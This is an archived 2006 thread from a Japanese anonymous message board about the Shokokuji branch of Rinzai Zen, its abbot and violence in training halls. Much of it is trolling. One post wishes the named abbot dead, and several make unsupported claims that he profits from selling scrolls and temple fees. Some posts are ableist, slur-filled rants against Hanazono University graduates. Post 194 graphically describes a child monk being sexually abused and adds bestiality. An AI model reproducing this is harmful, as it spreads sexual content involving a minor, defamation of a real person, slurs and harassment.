5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

臨済宗相國寺派について

1 :名無しさん@京都板じゃないよ:2006/05/04(木) 22:33:43
臨済宗相國寺派と相國僧堂について議論しましょう!!

2 :名無しさん@京都板じゃないよ:2006/05/04(木) 22:39:28
暴力禁止、健康第一の相國僧堂は、間違いなく日本一です!!(⌒∀⌒)

3 :名無しさん@京都板じゃないよ:2006/05/04(木) 23:58:11
有馬管長の掛け軸問題について

4 :名無しさん@京都板じゃないよ:2006/05/05(金) 06:19:09
祝 アリー魔専用スレ 開単。

僧堂は楽相國として、有名。

5 :名無しさん@京都板じゃないよ:2006/05/05(金) 15:58:21
むすこ元気か?

6 :名無しさん@京都板じゃないよ:2006/05/05(金) 16:54:58
とりあえず、ふりがな打っといて。地元民でも統一されてないし。

7 :名無しさん@京都板じゃないよ:2006/05/05(金) 19:05:54
ちんこ

8 :名無しさん@京都板じゃないよ:2006/05/05(金) 20:15:20
うんこ

9 :名無しさん@京都板じゃないよ:2006/05/05(金) 21:46:32
まんこ

10 :名無しさん@京都板じゃないよ:2006/05/06(土) 08:50:23
頭の形が栗斗利洲

11 :名無しさん@京都板じゃないよ:2006/05/11(木) 16:10:53


12 :名無しさん@京都板じゃないよ:2006/05/11(木) 18:03:54
有馬頼底死ね

13 :名無しさん@京都板じゃないよ:2006/05/14(日) 14:38:02
広隆寺に謝罪しろ

14 :名無しさん@京都板じゃないよ:2006/05/14(日) 15:17:59
なんで広隆寺に謝罪するの?なにかしたの?
ちなみに広隆寺って、太秦の?
 
43歳独身 (趣味オナニー。休みの日は一日2〜3回)

15 :名無しさん@京都板じゃないよ:2006/05/19(金) 13:15:04
はげ

16 :名無しさん@京都板じゃないよ:2006/05/19(金) 20:51:27
意味わかんね

17 :名無しさん@京都板じゃないよ:2006/05/24(水) 03:10:43
人気ないね

18 :名無しさん@京都板じゃないよ:2006/05/24(水) 07:25:44
人気アリマせん

19 :名無しさん@京都板じゃないよ:2006/05/24(水) 10:35:18
うまい。おーい山田くん、
ブッシュに扇子ひとつあげてくれ。

20 :名無しさん@京都板じゃないよ:2006/05/28(日) 21:12:00
有馬師北朝鮮あげ

21 :名無しさん@京都板じゃないよ:2006/06/06(火) 02:28:41
金閣銀閣

22 :名無しさん@京都板じゃないよ:2006/06/06(火) 07:10:49
金正日閣下、やくして金閣。ばんせー、ばんせー。

23 :名無しさん@京都板じゃないよ:2006/06/06(火) 15:01:31
赤色華族
金色管長

24 :名無しさん@京都板じゃないよ:2006/06/21(水) 20:32:42
かねもってこい

25 :名無しさん@京都板じゃないよ:2006/06/24(土) 20:42:26
管長の室号おしえてください?

26 :名無しさん@京都板じゃないよ:2006/06/24(土) 20:46:48
すべては世間体を気にするゆえに始まりました。

27 :名無しさん@京都板じゃないよ:2006/06/24(土) 20:49:59
そんアンナ話あったト?知らんよ。

28 :名無しさん@京都板じゃないよ:2006/06/25(日) 06:56:50
ちんこ

29 :名無しさん@京都板じゃないよ:2006/06/25(日) 09:49:27
かねもってこい

30 :名無しさん@京都板じゃないよ:2006/06/25(日) 10:49:08
相國寺管長と相國僧堂老師に対する侮辱は侮辱罪で告訴します。

31 :名無しさん@京都板じゃないよ:2006/06/25(日) 12:29:17
はげの捨てセリフ

32 :名無しさん@京都板じゃないよ:2006/06/25(日) 12:41:18
はげってだれの事ですか。
私ははげていません。
剃っているだけです。


33 :名無しさん@京都板じゃないよ:2006/06/25(日) 12:52:45
↑激しくはげてんか

34 :名無しさん@京都板じゃないよ:2006/06/25(日) 13:01:32
>>28
ちんぽだのまんこだのと下品ですよアナタ

35 :名無しさん@京都板じゃないよ:2006/06/25(日) 21:54:40
太秦の広隆寺と相国は何の接点もないとおもうけど。

36 :名無しさん@京都板じゃないよ:2006/06/26(月) 07:46:22
太秦の広隆寺って、映画村のところにある、お寺でしょ?
良いお寺ですね。

37 :名無しさん@京都板じゃないよ:2006/06/26(月) 09:04:23
宗旨も違うし、謝るようなことしてないんじゃないの?

38 :名無しさん@京都板じゃないよ:2006/06/26(月) 13:48:21
御袍事件を知らぬのかー

39 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:15:26
しらないおしえて?

40 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:22:56
歴代天皇陛下が即位の後に、黄櫨染の御袍を広隆寺の聖徳太子に奉納する事はしっています。
今上の御世になって、その風習も途絶えかけたのも知っています。
しかし、相国寺と御袍が関係有るとは、歴史でも習っていません。
後学のためにもぜひ教えてください。

41 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:27:42
推理、途絶えかけた時に、同級生だから、と?


42 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:37:06
有馬倪下はただ意地悪したのさ
仏教会会長として
それを知った東伏見倪下が皇居へ乗り込んで
同じ倪下でもやはり閣下より殿下がつおかったのら

43 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:57:18
京都仏教会のメンバー同士でなんで?
どんな意地悪したの?

44 :名無しさん@京都板じゃないよ:2006/06/26(月) 14:58:35
特定の寺院のみ、廃仏毀釈以後も優遇されるのはおかしいとでも?

45 :名無しさん@京都板じゃないよ:2006/06/26(月) 16:06:15
太秦の後継ぎに娘がなるって時に会長に挨拶がなかったのを逆恨みして衣の下賜を妨害したんだよ
それを前会長が救ったの

46 :名無しさん@京都板じゃないよ:2006/06/26(月) 16:12:06
わぁー、うつわ、ちっさーーーーー。

47 :名無しさん@京都板じゃないよ:2006/06/26(月) 16:26:15
それで、妨害工作は失敗したの?
その妨害工作について、本人は認めて謝罪したの?

48 :名無しさん@京都板じゃないよ:2006/06/26(月) 17:02:34
相國僧堂、万歳!!

49 :名無しさん@京都板じゃないよ:2006/06/26(月) 17:13:40
自分の僧堂を此処までに誇れる貴方に乾杯。
よっぽどよかったのですね。

50 :名無しさん@京都板じゃないよ:2006/06/26(月) 17:15:24
さすがだね。前会長の殿下は偉いかただ。

51 :名無しさん@京都板じゃないよ:2006/06/26(月) 17:18:07
まちがいなく侮辱罪で告訴です。

52 :名無しさん@京都板じゃないよ:2006/06/26(月) 17:38:53
まあ殿下は殿下で青蓮院私物化問題で天台宗内では憎まれてるわけだが
21世紀の今でも
旧皇族(東伏見殿下)>旧華族(有馬閣下)>平民てこと

53 :名無しさん@京都板じゃないよ:2006/06/26(月) 21:04:03
長い間続いてきた身分制度が残っているのは、当たり前だ。

54 :名無しさん@京都板じゃないよ:2006/06/27(火) 00:45:19
その通り
だから有馬閣下が天皇陛下と学習院御学友であるのをいい事に
陛下(と自分)御還暦奉祝掛け軸《60万円》を売り出したのは当然の権利である
金閣・銀閣の拝観料のほとんどが有馬閣下の懐に入るのも当然の権利である

55 :名無しさん@京都板じゃないよ:2006/06/27(火) 06:07:35
僧侶らしくなってくれなんて期待はありません。
もすこし品よくしてもらいてい。

56 :名無しさん@京都板じゃないよ:2006/06/27(火) 06:13:23
広隆寺にかわって青蓮院東伏見猊下が直訴したってこと?

57 :名無しさん@京都板じゃないよ:2006/06/27(火) 06:49:15
掛け軸が60万ってすごいな。
金粉とか、宝石とかついてんのか?

58 :名無しさん@京都板じゃないよ:2006/06/27(火) 06:54:15
華族=品が良い
と思っちょた。

59 :名無しさん@京都板じゃないよ:2006/06/27(火) 08:09:41
有馬ってさ、子供の頃から寺に入れられて、以来ずっと寺で
育ってきたんだろ?じゃあ品がないのも宗門の教育が
悪かったんじゃん。

60 :名無しさん@京都板じゃないよ:2006/06/27(火) 08:52:21
有馬管長は、十三年も相國僧堂で修行したんだぞ。

61 :名無しさん@京都板じゃないよ:2006/06/27(火) 08:54:59
な〜にが、品よくだあ〜!!
品のよくて、威風堂々とした禅僧がつとまるかあ!!


62 :名無しさん@京都板じゃないよ:2006/06/27(火) 09:01:40
有馬さん老師なの?

63 :名無しさん@京都板じゃないよ:2006/06/27(火) 09:30:15
有馬老師は、素晴らしい!!

64 :名無しさん@京都板じゃないよ:2006/06/27(火) 10:57:46
直訴つうか強奪に行った
やっぱり天皇陛下の御学友有馬閣下より天皇陛下の叔父上東伏見殿下の方がつおかった

65 :名無しさん@京都板じゃないよ:2006/06/27(火) 11:18:09
そんなもの、強奪しようと思っても強奪できるもでないでしょ。

66 :名無しさん@京都板じゃないよ:2006/06/27(火) 13:39:30
ギシアン ギシアン んあっっつ!!

67 :名無しさん@京都板じゃないよ:2006/06/27(火) 14:02:08
そりゃ強奪はしとらんやろw
でもジゴーさんの傲慢不遜は宮内庁・京都市・天台宗・仏教会揃って憎しみの対象。

68 :名無しさん@京都板じゃないよ:2006/06/27(火) 14:08:42
では、この事件では電化と各課どっちが正しかったの?

69 :名無しさん@京都板じゃないよ:2006/06/27(火) 18:49:35
>>68
りゃ、正論は電化だろ。

>>61
品がいいことと威風堂々たることは、
禅僧において共存し得ないってことを
暴露ったな。www
あほくさ。。。

70 :名無しさん@京都板じゃないよ:2006/06/27(火) 19:03:20
本当は威風堂堂として品格がなければね。
五家の臨済将軍の品格が整わないよ。

71 :名無しさん@京都板じゃないよ:2006/06/27(火) 19:19:50
>>70 そのとおりだよ。

臨済僧における威風堂々ってのは、
傲慢で、我が強くて、自分をアピるために他人を陥れて、
間違ってない人に恥をかかせて、それでも平気でいて
自分の非を顧みようともしないことを言うんだろ。

72 :名無しさん@京都板じゃないよ:2006/06/27(火) 19:26:02
↑臨済宗はそんな香具師おおいね。はきだめのあしのひっぱりあい。

73 :名無しさん@京都板じゃないよ:2006/06/27(火) 19:27:34
うまいこと言うねぇ。

74 :名無しさん@京都板じゃないよ:2006/06/27(火) 19:30:26
目くそ鼻くそ笑うの境地。それがはげのステイタス。
あいつよりましとおもって、文句いってると、社会の底辺にいるのは
そのはげ。

75 :名無しさん@京都板じゃないよ:2006/06/27(火) 20:27:03
相國僧堂は、本当に素晴らしい(>_<)

76 :名無しさん@京都板じゃないよ:2006/06/27(火) 20:29:45
↑わかった。臨済宗系のスレはみんなそのことはわかった。
他宗派のスレでも宣伝しないと。

77 :名無しさん@京都板じゃないよ:2006/06/27(火) 20:31:22
ほめ頃しはやめましょう。

78 :名無しさん@京都板じゃないよ:2006/06/27(火) 20:43:33
托鉢中等に、金閣寺や銀閣寺で休憩出来るし、ほんまに、ええわあ(^o^)
金閣寺と銀閣寺が好きなもんには、ほんまに、最高やねえ(^o^)

79 :名無しさん@京都板じゃないよ:2006/06/27(火) 20:59:09
承天閣美術館最高・

80 :名無しさん@京都板じゃないよ:2006/06/27(火) 21:09:25
7重塔最高

81 :名無しさん@京都板じゃないよ:2006/06/27(火) 21:22:44
http://aqua.gazo-ch.net/orz/read.php/thread/7/541734/

82 :名無しさん@京都板じゃないよ:2006/06/27(火) 21:23:45
ぷっ。

83 :名無しさん@京都板じゃないよ:2006/06/29(木) 11:16:59
わし、暴力禁止・健康第一の相國僧堂に入門するよm(_)m

84 :名無しさん@京都板じゃないよ:2006/06/29(木) 12:44:11
ええか、ええか、ええのんか?

85 :名無しさん@京都板じゃないよ:2006/06/29(木) 13:55:24
鶴こうか、

86 :名無しさん@京都板じゃないよ:2006/06/29(木) 15:59:51
光運字

87 :名無しさん@京都板じゃないよ:2006/06/29(木) 18:15:17
雲水がインタカフェに

88 :名無しさん@京都板じゃないよ:2006/06/29(木) 18:47:57
インターネットカフェに行って何が悪いんよ?
休日は、自由だろうが?

89 :名無しさん@京都板じゃないよ:2006/06/29(木) 18:53:48
軍人も、休日は街を散策して、喫茶店等に入って満喫してんだろうが!!
雲水も、同じじゃ!!
僧堂は、軍人訓練所と同じだろうが!!

90 :名無しさん@京都板じゃないよ:2006/06/29(木) 19:12:09
雄琴のソープ、河原町のヘルス、祇園のラウンジ、
は行ってもいいの?

91 :名無しさん@京都板じゃないよ:2006/06/29(木) 19:16:21
僧堂は軍人訓練所と同じ?
そうですか?
暴力肯定ですもんね。

92 :名無しさん@京都板じゃないよ:2006/06/29(木) 19:19:04
いまどきまともな奴は風俗なんていかないよ。
みんな大学時代からの彼女いるから。

93 :名無しさん@京都板じゃないよ:2006/06/29(木) 19:48:58
その方が遊びに走らなくていいよね。
風俗行くとイメージ悪いしね。

94 :名無しさん@京都板じゃないよ:2006/06/29(木) 22:39:48
軍人に大切なのは、精神統一である。
だからこそ、軍人は昔から坐禅をする。
軍人=暴力ではない。
軍人=禅定である。

95 :名無しさん@京都板じゃないよ:2006/06/29(木) 23:41:39
23歳の軍人(埼玉県川口市出身)です。
私は浄土真宗なんですが、
軍人にむいてないでしょうか?


96 :名無しさん@京都板じゃないよ:2006/06/29(木) 23:42:56
禅にやさしさは無用です。

97 :名無しさん@京都板じゃないよ:2006/06/29(木) 23:57:06
禅に愛は不要です。

98 :名無しさん@京都板じゃないよ:2006/06/29(木) 23:57:38
禅にはやはり、厳しさです。

99 :名無しさん@京都板じゃないよ:2006/06/29(木) 23:58:43
夜行に愛は必要ですか?

100 :名無しさん@京都板じゃないよ:2006/06/30(金) 09:55:20
本物の軍人を目指すなら禅が一番だと思うぜ!!

101 :名無しさん@京都板じゃないよ:2006/06/30(金) 10:13:06
相國僧堂は、自分に厳しい雲水しかおらんから、他人からの暴力など無用なのさ。

102 :名無しさん@京都板じゃないよ:2006/06/30(金) 13:37:35
他人に厳しく、自分に優しい。
新倒に厳しく、地球にやさしい。


103 :名無しさん@京都板じゃないよ:2006/06/30(金) 13:44:01
相國寺=有馬のイメージが強すぎる。僧堂の老師も影が薄いな。

104 :名無しさん@京都板じゃないよ:2006/06/30(金) 18:50:19
競馬のこと?

105 :名無しさん@京都板じゃないよ:2006/06/30(金) 23:36:48
相國僧堂の老師を知らんとは、モグリだな。
毎月、東京に出張して坐禅会やっとるし、居士林の智勝会等も活発じゃねえか。

106 :名無しさん@京都板じゃないよ:2006/07/01(土) 12:35:29
しらなーい。知ってるのは内輪の人間じゃない。

107 :名無しさん@京都板じゃないよ:2006/07/01(土) 18:58:01
相國僧堂を盛り上げてる人がいるようだが、今はそんなに人がいないの?

108 :名無しさん@京都板じゃないよ:2006/07/01(土) 19:38:05
自分の名を高めるために、自分の僧堂名ををたかめる。

林家こぶ平や林家三平の一家は以上に身内を褒め称えます。

109 :名無しさん@京都板じゃないよ:2006/07/01(土) 19:43:32
こぶちゃん僧堂

110 :名無しさん@京都板じゃないよ:2006/07/01(土) 19:44:40
うつわ小騒動

111 :名無しさん@京都板じゃないよ:2006/07/01(土) 20:09:18
相國僧堂、万歳!!

112 :名無しさん@京都板じゃないよ:2006/07/01(土) 21:33:51
共和国僧堂、万歳!!

113 :名無しさん@京都板じゃないよ:2006/07/02(日) 15:08:32
わし、暴力反対派やし、相國僧堂に行く事に決めた!!万歳!!万歳!!万歳!!

114 :名無しさん@京都板じゃないよ:2006/07/02(日) 16:24:44
もれも暴力反対だ。でも○○僧堂にはいかない。

115 :名無しさん@京都板じゃないよ:2006/07/02(日) 17:35:42
現在の日本では、どのような思想があろうとも、暴力は違法です。
被害届けを受けた警察機関は、徹底的に捜査するでしょう。

116 :名無しさん@京都板じゃないよ:2006/07/02(日) 19:13:20
相国僧堂は托鉢のとき、節をつけてホーって言ったり、
軒先で四弘誓願を読んだりする?
うちの近くにそういう托鉢をしてる雲水が来るんだけど、
いつも看板袋を見損なって、どこだかわかんない。

南禅とか天龍も来てるみたいだけど、いちど相国僧堂の
雲水も見かけたことがあるので、ひょっとしてと思って。

117 :名無しさん@京都板じゃないよ:2006/07/02(日) 21:11:36
同でもいいじゃん、ばっかじゃない。また自慢につなげんだよ。

118 :名無しさん@京都板じゃないよ :2006/07/02(日) 21:56:24
何千時の厳しさについて行けなくなったよ〜
よし気楽な笑国に転錫だ!


119 :名無しさん@京都板じゃないよ:2006/07/02(日) 22:01:43
「気楽笑国」
いいね。たのしそう。

120 :名無しさん@京都板じゃないよ:2006/07/03(月) 02:10:32
研修センター化か。ふ抜けの量産だな。ますます堕落するばっか。

121 :名無しさん@京都板じゃないよ:2006/07/03(月) 09:16:29
「笑國」って良い命名。たのしそう。

122 :名無しさん@京都板じゃないよ:2006/07/03(月) 09:52:47
人生短いんだから楽しく生きようよ〜(^o^)

123 :名無しさん@京都板じゃないよ:2006/07/03(月) 09:54:37
それがいちばんだよ。
みんな仲良く、健康な心と体で楽しく修行できればこんな良い事ないよ。

124 :名無しさん@京都板じゃないよ:2006/07/03(月) 09:56:26
楽しい修行の宝石箱やーー。

125 :名無しさん@京都板じゃないよ:2006/07/03(月) 13:21:20
金閣→金玉
銀閣→銀玉
ついでに改称しておきました。

126 :名無しさん@京都板じゃないよ:2006/07/03(月) 13:40:36
金玉、銀玉、ゆかいな修行仲間のメリーゴーランドやーーー

127 :名無しさん@京都板じゃないよ:2006/07/03(月) 18:05:36
わしは、相國僧堂に行く事に決めたよm(_)m
それと、相國僧堂を侮辱すると侮辱罪で告訴されるよm(_)m

128 :名無しさん@京都板じゃないよ:2006/07/03(月) 18:43:35
>>127
ケツの孔の小さいことを言っているようでは、まだまだw

129 :名無しさん@京都板じゃないよ:2006/07/04(火) 09:52:10
わしは、相國僧堂に行く。
おまえも、来い。

130 :名無しさん@京都板じゃないよ:2006/07/04(火) 15:37:37
有馬管長倪下はご自身と天皇陛下が70才になれば今度は70万円の古稀記念掛け軸販売ですか?
○寿にの祝いの度にその年令と同じ額の掛け軸販売ですか?
年々値段が釣り上がりますね!

131 :名無しさん@京都板じゃないよ:2006/07/04(火) 16:39:54
わし、有馬老師が、大好きや!!

132 :名無しさん@京都板じゃないよ:2006/07/04(火) 17:07:06
キムチョンイルともコネクションがあるお方ですからw

133 :名無しさん@京都板じゃないよ:2006/07/05(水) 16:37:55
>>127 >>129 志があれば、まず妙心寺へ行きなされ。
森本省念老師もそうおっしゃっておられた。

134 :名無しさん@京都板じゃないよ:2006/07/05(水) 20:04:54
わしは、相國僧堂に行く!!

135 :名無しさん@京都板じゃないよ:2006/07/05(水) 21:46:06
わしも小黒自慰だいすきや。

136 :名無しさん@京都板じゃないよ:2006/07/05(水) 21:50:29
それでは、75歳におなりになれば、掛け軸のお値段は

73万えんですね。

137 :名無しさん@京都板じゃないよ:2006/07/06(木) 10:09:28
相國僧堂、万歳!!

138 :名無しさん@京都板じゃないよ:2006/07/06(木) 11:00:31
刑法 第27章 傷害の罪
第204条「傷害」
人の身体を傷害したる者は10年以下の懲役又は罰金若くは科料に処す

139 :名無しさん@京都板じゃないよ:2006/07/06(木) 11:02:59
傷害罪は僧堂にもあてはまりますか?
もちろんですよね。

140 :名無しさん@京都板じゃないよ:2006/07/06(木) 15:33:08
日本に住んでいる限り、法律には逆らえん。
そこが、何処であろうとも。
刑務所であろうと軍隊であろうと僧堂であろうと、法律は適用される。
人を殴ったら、逮捕!!
法衣を掴んだら、逮捕!!
暴言を吐いたら、逮捕!!
突き飛ばしたら、逮捕!!
逮捕!!逮捕!!逮捕!!

141 :名無しさん@京都板じゃないよ:2006/07/06(木) 22:22:18
逮捕や告訴とか言って脅すより、

雲水時代に人をいじめると、一生恨み続けられることを教えたほうが良い。

祟りやーーーーーー・

142 :名無しさん@京都板じゃないよ:2006/07/07(金) 06:56:19
桃栗三年柿八年

だるま9年に

わし一生

143 :名無しさん@京都板じゃないよ:2006/07/07(金) 07:26:17
慧可に大物ぞろい

144 :名無しさん@京都板じゃないよ:2006/07/07(金) 11:42:01
わしは、相國僧堂が、大好きやー!!

145 :名無しさん@京都板じゃないよ:2006/07/07(金) 15:12:38
自分ところが一番で後の僧堂を見下している。

146 :京都市民:2006/07/07(金) 15:14:19
>>145
それは、誤解でしょう。

147 :名無しさん@京都板じゃないよ:2006/07/07(金) 19:20:17
相國僧堂は、世界一の僧堂です!
相國老師は、宇宙一の老師です!!

148 :名無しさん@京都板じゃないよ:2006/07/07(金) 19:27:56
我がナチスのー科学力はーー世界一ーーーー!

149 :名無しさん@京都板じゃないよ:2006/07/07(金) 19:35:02
はい、はい。世界一、世界一。

150 :名無しさん@京都板じゃないよ:2006/07/07(金) 23:58:35
うっひょおー!!相國僧堂、大好きー!!

151 :名無しさん@京都板じゃないよ:2006/07/08(土) 06:51:43
あっそう、大好きなんだ。よかったね。

152 :名無しさん@京都板じゃないよ:2006/07/08(土) 07:15:27
○○僧堂は、京都一の僧堂です!

153 :名無しさん@京都板じゃないよ:2006/07/08(土) 07:16:17
妙心かな、南禅かな。

154 :名無しさん@京都板じゃないよ:2006/07/08(土) 10:34:04
暴力禁止!!

155 :名無しさん@京都板じゃないよ:2006/07/09(日) 18:13:47
相國居士は、日本一の居士です!
相國僧堂は、世界一の僧堂です!!
相國老師は、宇宙一の老師です!!!

156 :名無しさん@京都板じゃないよ:2006/07/09(日) 20:14:18
相国雲水は、町内一の雲水です!!!!

157 :名無しさん@京都板じゃないよ:2006/07/09(日) 20:51:46
>>155,156
これも暴力です、わからんのか!!!!!


158 :名無しさん@京都板じゃないよ:2006/07/09(日) 21:30:16
>>157
わかりません

ばーか!

159 :名無しさん@京都板じゃないよ:2006/07/09(日) 22:47:01
βακα

160 :名無しさん@京都板じゃないよ:2006/07/12(水) 14:03:41
わしは、暴力禁止の相國僧堂に行く事にするよm(_)m

161 :名無しさん@京都板じゃないよ:2006/07/12(水) 14:36:02
千日回峰について 
http://travel2.2ch.net/test/read.cgi/kyoto/1043510444/l50

荒らしてる自称臨済宗のひとがいます。

ひきとれ。

162 :名無しさん@京都板じゃないよ:2006/07/14(金) 10:28:57
>>161
おまえも、このスレ荒らしとるだろうが!!ぼけえ!!

163 :名無しさん@京都板じゃないよ:2006/07/16(日) 19:43:00
おちんこ

164 :名無しさん@京都板じゃないよ:2006/07/16(日) 20:26:35
おまんこ

165 :名無しさん@京都板じゃないよ:2006/07/16(日) 20:38:42
おさね

166 :名無しさん@京都板じゃないよ:2006/07/17(月) 19:25:42
天然ガス天然ガス天然ガス天然ガス天然ガス
天然ガス天然ガス天然ガス天然ガス天然ガス

スガ然天スガ然天スガ然天スガ然天スガ然天
 スガ然天スガ然天スガ然天スガ然天スガ然天

 天然ガス天然ガス天然ガス天然ガス天然ガス
天然ガス天然ガス天然ガス天然ガス天然ガス

スガ然天スガ然天スガ然天スガ然天スガ然天
 スガ然天スガ然天スガ然天スガ然天スガ然天



167 :名無しさん@京都板じゃないよ:2006/07/17(月) 19:43:08
失せろ!!

168 :名無しさん@京都板じゃないよ:2006/07/21(金) 14:07:33
【5流以下花園大卒者の特徴】

●とにかくコンプレックスが激しい(二言目には高卒には負けない!)
●一生5流の烙印を背負って生きていかなければならない(高卒は社会人入学で逃げれる)
●社会から干されている(無職・使い道が極端に無い)
●ストレスを溜め込んでは、キレて関係ない人間を巻き添えにして暴れまくる(空気の読めない短気さ)
●高い金を、これまた5流の馬鹿親に出させても、元が取れない哀れな知障ww
●再三浪人をしたにもかかわらず5流しか入れない(基本的に負け犬)
●社内でもダメレッテルを貼られまくられ、辞職してしまう
●酷いのは高卒上司に顎で使われまくる
●下手に大卒にしがみつきたいが為に、一生を棒に振ってしまったw
●学校名を聞かれると一瞬青ざめてしまう(劣等感が支配している)
●上場企業から見向きもされない。(かといって中小企業にも入る度胸がない)
●事実、社内でも重要なポストとは無縁(社会でも待遇は同じ・乞食同然)
●将来、自分の学校(大学)が閉鎖になる事を恐れている。
●資格を持った専門学生にすら頭が上がらないw
●結婚もできない(出来ても相手も同じ5流以下者)
●身なりや言動、思考が中卒並み w
●自殺者は5流以下卒者が大部分(高卒にさえ社会で苛められまくる)
●趣味は電車内の痴漢(捕まっても5流だから仕方ないと諦められる)ww
●とにかく取り柄がまったく無い。単なる馬鹿(笑われ者)
●ホワイトカラーが似合わない(ブルーカラーの世界でも爪弾き)
●要は社会として(人間として)必要とされていない

花園大学では知的障害者がアウアウと喚きながら構内をうろついているんだよ。
学生もあほでオタクみたいな奴が多い。
教授も他の大学では使い物にならない基地害サヨクが多い。
花園大学は使い物にならないゴミ教授の処分場化している。
むしろこんな大学卒業するよりも中退して違う大学行くか専門学校いった方がいいよ。
10年以上前から花園は大学なんかじゃない。
大学の顔をした動物園だよ。

169 :名無しさん@京都板じゃないよ:2006/07/22(土) 01:24:34
>>168
失せろ!!

170 :名無しさん@京都板じゃないよ:2006/07/22(土) 13:39:12
上げておきますね
基地外さんwww

171 :名無しさん@京都板じゃないよ:2006/07/22(土) 13:49:31
こんな鬼叢林に誰が行くもんか!!

172 :名無しさん@京都板じゃないよ:2006/07/22(土) 13:51:00
ここは真宗禿の姉妹スレですか?

173 :名無しさん@京都板じゃないよ:2006/07/22(土) 15:31:08
う〜ん。迷いましたが、僕も安心安全な瑞巖僧堂に行きますね(^_^)

174 :名無しさん@京都板じゃないよ:2006/07/22(土) 15:55:31
>>171
>>172
>>173
失せろ。嘘はバレル。

175 :名無しさん@京都板じゃないよ:2006/07/22(土) 15:57:21
私も暴力禁止の相國僧堂に行きます(^o^)

176 :名無しさん@京都板じゃないよ:2006/07/22(土) 16:49:11
【花大卒≒花大出】

2007年は全大学の定員が高校卒業生を初めて上回る年だから、今後の学歴の扱いの動向については2つの意見がある。

@大卒とそれ以下(日本最低の花大は中卒以下)で格差が広がる。
A大卒の中で一流とそれ以外(日本最低の花大は中卒以下)で格差がでる。

どちらに転がっても大卒(日本最低の花大は中卒以下)の学歴の価値は明らかに低下するという評価には変わらない。


177 :名無しさん@京都板じゃないよ:2006/07/22(土) 18:56:32
基地外を排出するな!

178 :名無しさん@京都板じゃないよ:2006/07/22(土) 21:25:16
わしは、總持寺僧堂に行ってくるぜ。

179 :名無しさん@京都板じゃないよ:2006/07/22(土) 21:26:28
私も暴力禁止の東福僧堂に行きます(^o^)

180 :名無しさん@京都板じゃないよ:2006/07/22(土) 21:33:18
暴力と親切の混同禁止!

181 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:03:30
>>179
嘘つきは、失せろ!!

182 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:04:58
>>173
嘘つきは、失せろ!!

183 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:08:37
>>180
あーん!?
てめえは「指導と称して長年行われてきた臨済宗僧堂内での暴力事件」として新聞の記事に記載されてえのか!?
あの事件依頼、監視されてんだぞ!!

184 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:17:58
あの事件って何?
アーリーマの?

185 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:19:23
昨日警策打たれました。

明らかな暴力ですから訴えま〜すwww

186 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:28:38
結跏趺坐を強要されました。

暴力です!

だれか訴えてください!
新聞に載せてください!

187 :名無しさん@京都板じゃないよ:2006/07/22(土) 23:51:13
お腹一杯になると眠たくなるのでご飯を残しました。

「もったいないから、喰え!」と、食い上げを強要されました。

これは酷い暴力です。
体罰なんでしょうか?

訴えても良いのでしょうか?

188 :名無しさん@京都板じゃないよ:2006/07/23(日) 00:30:41
ああ、人権を無視しての強制は、全部、暴力だな。

189 :名無しさん@京都板じゃないよ:2006/07/23(日) 04:13:19
真言や禅など原始仏教原理主義を唱えるくせに
権力に癒着して民衆の救済など微塵も考えない。
真宗はまさに大乗の完成された最も美しい教えであり、
誰もが理解でき救われない者はいない高度な教え。

190 :名無しさん@京都板じゃないよ:2006/07/23(日) 07:28:15
>>189
戯言をほざくな。

191 :名無しさん@京都板じゃないよ:2006/07/23(日) 09:33:31
人権厨
プロ市民禅
wwwww

192 :名無しさん@京都板じゃないよ :2006/07/23(日) 15:14:25
雷艇

193 :名無しさん@京都板じゃないよ:2006/07/23(日) 15:42:26
臨済宗立5流私立大学の定義

偏差値:40以下
知名度:無し(ある意味有名)
容姿:見るからに馬鹿そう(モヒカンや変な髪型の奴が多い)
生活:だらしがない
授業料:すねかじり
世間の評価:常に周りから軽侮の対象となっている
理解力:無いに決まっている
存在価値:無し
将来性:2010年には潰れる予定・・・

ちゃっちゃと潰しちゃいましょう



194 :名無しさん@京都板じゃないよ:2006/07/23(日) 19:25:35
臨済宗のホモ伝統といえば、今年出版された一休さんの伝記漫画(全5巻・文庫版)で、わざわざ一章分、その話だった。
まだ小僧だった一休さんは、寺に預けられるや否や、兄弟子たちの慰みモノにされて、
生フェラ→口内射精→ゲホッ→吐くな!バカヤロウ!全部飲め!…や、
テコキで、あぁ…一休、いいぞ、いいぞ、いくぞ→ドピュッ→顔面にこびりついたザーメンを泣きながら川で洗う一休…とか、
逆に兄弟子たち数人にオチンチンやカラダ中を舐め回され、不覚にも発射してしまい落ち込む一休…とか、
今日は特別に重要な修行をさせてやると和尚さまに呼び出され、ついに老僧にアヌスのバージンを奪われる一休…とか、
あぁ、現実の「一休さん」っていうか臨済宗はこうだった、否、こうなんだな…って内容がこれでもか!と続いてた。
これをアニメにして放映すればよかったのに。
一休さんに無理矢理チンボーをくわえさせる珍念さん。
その一休さんの中を割り裂いて無理矢理闖入する秀念さん。
隣の部屋では崖観和尚が美少年・鉄梅さんを犯し、その頃、金閣寺では将軍さまと新右衛門さんと桔梗屋がオカマ3Pに突入。
皆があ〜う〜ヤってる隙をついて本堂の饅頭を全てたいらげる黙念さん。
寺の外では猫がサヨちゃんにのしかかり、禁断の獣姦ロリプレイが…。
全日本PTA連合会・推薦。臨済宗大本山大徳寺・監修。

…臨済宗って、本当にオゾマシイですね。

195 :名無しさん@京都板じゃないよ:2006/07/23(日) 22:04:16
お尻の穴が痛くても、温めてまた修行。…臨済宗。

196 :名無しさん@京都板じゃないよ:2006/07/24(月) 10:29:50
馬鹿な荒らしが、暴れとる!!
みんな、惑わされずに無視しろ!!
相國寺と相國僧堂を誉める言葉の投稿だけをしよう!!


197 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:07:28
相福僧堂最強。
相國と祥福でこわいものなし。

198 :名無しさん@京都板じゃないよ:2006/07/24(月) 11:14:34
相國僧堂の雲水って、今何人?

